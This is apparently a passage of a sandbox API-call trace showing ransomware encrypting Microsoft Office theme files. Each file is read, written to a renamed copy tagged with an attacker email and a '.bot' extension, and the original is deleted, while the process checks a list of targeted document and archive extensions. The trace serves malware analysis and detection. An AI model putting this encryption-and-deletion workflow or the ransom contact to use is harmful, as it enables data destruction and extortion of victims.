	[0141.250] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.250] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.272] GetLastError () returned 0x0
	[0141.273] ReadFile (in: hFile=0x3ac, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x354c6, lpOverlapped=0x0) returned 1
	[0141.318] WriteFile (in: hFile=0x3a4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x354d0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x354d0, lpOverlapped=0x0) returned 1
	[0141.322] ReadFile (in: hFile=0x3ac, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.322] WriteFile (in: hFile=0x3a4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0141.322] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.322] CloseHandle (hObject=0x3a4) returned 1
	[0141.322] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.322] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.327] CloseHandle (hObject=0x3ac) returned 1
	[0141.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.328] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx")) returned 1
	[0141.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.328] lstrlenW (lpString=".doc") returned 4
	[0141.328] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.328] lstrlenW (lpString=".docx") returned 5
	[0141.328] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.328] lstrlenW (lpString=".pdf") returned 4
	[0141.328] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString=".xls") returned 4
	[0141.329] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString=".xlsx") returned 5
	[0141.329] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.329] lstrlenW (lpString=".ppt") returned 4
	[0141.329] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.329] lstrlenW (lpString=".zip") returned 4
	[0141.329] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString=".rar") returned 4
	[0141.329] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString=".bz2") returned 4
	[0141.329] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString=".7z") returned 3
	[0141.329] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.329] lstrlenW (lpString=".dbf") returned 4
	[0141.329] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.329] lstrlenW (lpString=".1cd") returned 4
	[0141.329] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.329] lstrlenW (lpString=".jpg") returned 4
	[0141.329] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.329] lstrlenW (lpString=".doc") returned 4
	[0141.329] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString=".docx") returned 5
	[0141.329] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.329] lstrlenW (lpString=".pdf") returned 4
	[0141.329] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.329] lstrlenW (lpString=".xls") returned 4
	[0141.329] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.330] lstrlenW (lpString=".xlsx") returned 5
	[0141.330] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.330] lstrlenW (lpString=".ppt") returned 4
	[0141.330] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.330] lstrlenW (lpString=".zip") returned 4
	[0141.330] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.330] lstrlenW (lpString=".rar") returned 4
	[0141.330] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.330] lstrlenW (lpString=".bz2") returned 4
	[0141.330] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.330] lstrlenW (lpString=".7z") returned 3
	[0141.330] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.330] lstrlenW (lpString=".dbf") returned 4
	[0141.330] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.330] lstrlenW (lpString=".1cd") returned 4
	[0141.330] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76
	[0141.330] lstrlenW (lpString=".jpg") returned 4
	[0141.330] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.330] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.330] lstrlenW (lpString="Civic.eftx") returned 10
	[0141.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.369] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=42917) returned 1
	[0141.369] CloseHandle (hObject=0x3b4) returned 1
	[0141.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx")) returned 0x20
	[0141.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.607] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.607] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0141.628] GetLastError () returned 0x0
	[0141.628] ReadFile (in: hFile=0x3b4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xa7a5, lpOverlapped=0x0) returned 1
	[0141.735] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xa7b0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xa7b0, lpOverlapped=0x0) returned 1
	[0141.737] ReadFile (in: hFile=0x3b4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.737] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0141.737] SetEndOfFile (hFile=0x3c8) returned 1
	[0141.737] CloseHandle (hObject=0x3c8) returned 1
	[0141.737] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.737] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.740] CloseHandle (hObject=0x3b4) returned 1
	[0141.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.740] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx")) returned 1
	[0141.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.741] lstrlenW (lpString=".doc") returned 4
	[0141.741] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.741] lstrlenW (lpString=".docx") returned 5
	[0141.741] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.741] lstrlenW (lpString=".pdf") returned 4
	[0141.741] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.741] lstrlenW (lpString=".xls") returned 4
	[0141.741] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.741] lstrlenW (lpString=".xlsx") returned 5
	[0141.741] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.741] lstrlenW (lpString=".ppt") returned 4
	[0141.741] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.741] lstrlenW (lpString=".zip") returned 4
	[0141.741] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.741] lstrlenW (lpString=".rar") returned 4
	[0141.741] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.741] lstrlenW (lpString=".bz2") returned 4
	[0141.741] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.741] lstrlenW (lpString=".7z") returned 3
	[0141.741] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.742] lstrlenW (lpString=".dbf") returned 4
	[0141.742] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.742] lstrlenW (lpString=".1cd") returned 4
	[0141.742] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.742] lstrlenW (lpString=".jpg") returned 4
	[0141.742] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.742] lstrlenW (lpString=".doc") returned 4
	[0141.742] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString=".docx") returned 5
	[0141.742] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.742] lstrlenW (lpString=".pdf") returned 4
	[0141.742] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString=".xls") returned 4
	[0141.742] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString=".xlsx") returned 5
	[0141.742] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.742] lstrlenW (lpString=".ppt") returned 4
	[0141.742] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.742] lstrlenW (lpString=".zip") returned 4
	[0141.742] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString=".rar") returned 4
	[0141.742] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString=".bz2") returned 4
	[0141.742] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.742] lstrlenW (lpString=".7z") returned 3
	[0141.742] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.742] lstrlenW (lpString=".dbf") returned 4
	[0141.742] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.743] lstrlenW (lpString=".1cd") returned 4
	[0141.743] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77
	[0141.743] lstrlenW (lpString=".jpg") returned 4
	[0141.743] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.743] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.743] lstrlenW (lpString="Equity.eftx") returned 11
	[0141.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0141.800] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=24611) returned 1
	[0141.800] CloseHandle (hObject=0x398) returned 1
	[0141.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx")) returned 0x20
	[0141.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0141.801] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.801] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0141.801] GetLastError () returned 0x0
	[0141.801] ReadFile (in: hFile=0x398, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x6023, lpOverlapped=0x0) returned 1
	[0141.805] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x6030, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x6030, lpOverlapped=0x0) returned 1
	[0141.806] ReadFile (in: hFile=0x398, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.806] WriteFile (in: hFile=0x3c4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0141.806] SetEndOfFile (hFile=0x3c4) returned 1
	[0141.806] CloseHandle (hObject=0x3c4) returned 1
	[0141.806] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.806] SetEndOfFile (hFile=0x398) returned 1
	[0141.811] CloseHandle (hObject=0x398) returned 1
	[0141.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx")) returned 1
	[0141.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.812] lstrlenW (lpString=".doc") returned 4
	[0141.812] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.812] lstrlenW (lpString=".docx") returned 5
	[0141.812] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.812] lstrlenW (lpString=".pdf") returned 4
	[0141.812] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.812] lstrlenW (lpString=".xls") returned 4
	[0141.812] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString=".xlsx") returned 5
	[0141.813] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.813] lstrlenW (lpString=".ppt") returned 4
	[0141.813] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.813] lstrlenW (lpString=".zip") returned 4
	[0141.813] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString=".rar") returned 4
	[0141.813] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString=".bz2") returned 4
	[0141.813] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString=".7z") returned 3
	[0141.813] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.813] lstrlenW (lpString=".dbf") returned 4
	[0141.813] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.813] lstrlenW (lpString=".1cd") returned 4
	[0141.813] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.813] lstrlenW (lpString=".jpg") returned 4
	[0141.813] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.813] lstrlenW (lpString=".doc") returned 4
	[0141.813] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString=".docx") returned 5
	[0141.813] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.813] lstrlenW (lpString=".pdf") returned 4
	[0141.813] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString=".xls") returned 4
	[0141.813] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.813] lstrlenW (lpString=".xlsx") returned 5
	[0141.814] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.814] lstrlenW (lpString=".ppt") returned 4
	[0141.814] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.814] lstrlenW (lpString=".zip") returned 4
	[0141.814] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.814] lstrlenW (lpString=".rar") returned 4
	[0141.814] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.814] lstrlenW (lpString=".bz2") returned 4
	[0141.814] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.814] lstrlenW (lpString=".7z") returned 3
	[0141.814] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.814] lstrlenW (lpString=".dbf") returned 4
	[0141.814] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.814] lstrlenW (lpString=".1cd") returned 4
	[0141.814] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78
	[0141.814] lstrlenW (lpString=".jpg") returned 4
	[0141.814] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.814] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.814] lstrlenW (lpString="Executive.eftx") returned 14
	[0141.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0141.824] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=21156) returned 1
	[0141.824] CloseHandle (hObject=0x3c4) returned 1
	[0141.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx")) returned 0x20
	[0141.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0141.824] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.824] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
